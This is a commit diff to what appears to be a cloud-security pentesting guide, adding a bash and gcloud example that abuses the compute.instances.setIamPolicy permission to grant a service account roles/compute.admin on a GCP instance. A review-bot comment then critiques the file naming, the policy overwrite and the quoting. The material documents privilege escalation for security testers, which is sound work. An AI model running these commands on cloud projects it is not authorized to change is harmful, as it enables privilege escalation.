Update compute.instances.setIamPolicy

Include an example for `compute.instances.setIamPolicy` by adding a role to a Service Account.
1c3t0rm
2024-12-22 15:42:01 +01:00
committed by GitHub
parent 909a3378c2
commit cdbd8f9fd8

@@ -57,7 +57,23 @@ This permission gives the **same privileges as the previous permission** but ove
### `compute.instances.setIamPolicy`
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account:
```bash
export SERVER_SERVICE_ACCOUNT=YOUR_SA
export INSTANCE=YOUR_INSTANCE
export ZONE=YOUR_INSTANCE_ZONE
cat <<EOF > policy.json
bindings:
- members:
- serviceAccount:$SERVER_SERVICE_ACCOUNT
role: roles/compute.admin
version: 1
EOF
gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
```
### **`compute.instances.osLogin`**
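Review bot: The heredoc in the new example writes YAML (`bindings:`, `- members:`) into a file named `policy.json`, so the name and the content disagree; rename it to `policy.yaml` or write the body as JSON. The text should also say that `set-iam-policy` replaces the instance's whole IAM policy with the file's contents, so this single-binding file drops any bindings already present and carries no `etag`; a sentence telling the reader to start from the output of `get-iam-policy` would make that explicit. The nesting under `- members:` is flat in this rendering; confirm in the source that `- serviceAccount:...` is indented as a list item under `members` and that `role:` lines up with `members`, otherwise the file does not parse as a binding. `$INSTANCE` and `$ZONE` should be quoted in the `gcloud` line. Finally, a blank line between the sentence ending "to a Service Account:" and the opening code fence would keep the block rendering consistently with the rest of the file.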